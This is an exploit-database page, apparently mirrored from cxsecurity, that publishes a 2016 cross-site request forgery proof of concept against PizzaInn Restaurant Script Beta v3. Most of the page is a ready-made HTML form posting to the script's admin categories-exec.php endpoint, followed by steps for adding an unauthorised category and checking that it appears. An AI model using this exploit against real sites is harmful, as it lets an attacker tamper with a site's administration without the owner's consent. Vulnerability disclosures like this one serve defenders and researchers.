Advertisement






PizzaInn Beta 3 categories-exec.php Cross Site Request Forgery

CVE Category Price Severity
N/A CWE-352 $800 High
Author Risk Exploitation Type Date
Unknown High Remote 2016-10-20
CPE
cpe:cpe:/a:pizzainn:beta:3
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016100195

Below is a copy:

PizzaInn Beta 3 categories-exec.php Cross Site Request Forgery# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - CSRF Add Category
# Author :------------------------ : Nassim Asrir 
# Author Company :------------------------ : HenceForth
# Author Email :------------------------ : [email protected]
# Google Dork :---------------- :  -
# Date :-------------------------- : 20/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- :  PHP  
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html
 
   
############################ CSRF Add Category Vulnerabilty ############################
       
## Exploit ##

<html>
<title>CSRF Exploit By Nassim Asrir</title>
<CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION>
<form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)">
<tr>
    <th>Name</th>
    
</tr>
<tr>
    <td><input type="text" name="name" class="textfield" /></td>
    <td><input type="submit" name="Submit" value="Add" /></td>
</tr>
</form>
</table>
</html>

## Proc ##

- Create a .html File and Put the Code.

- Navigate the File in your Localhost .

- and create name of category (ex . Hacked) and you redirect to http://site/script/admin/access-denied.php

- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see a List named Category 

click in it and you can see your category added successfuly.


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum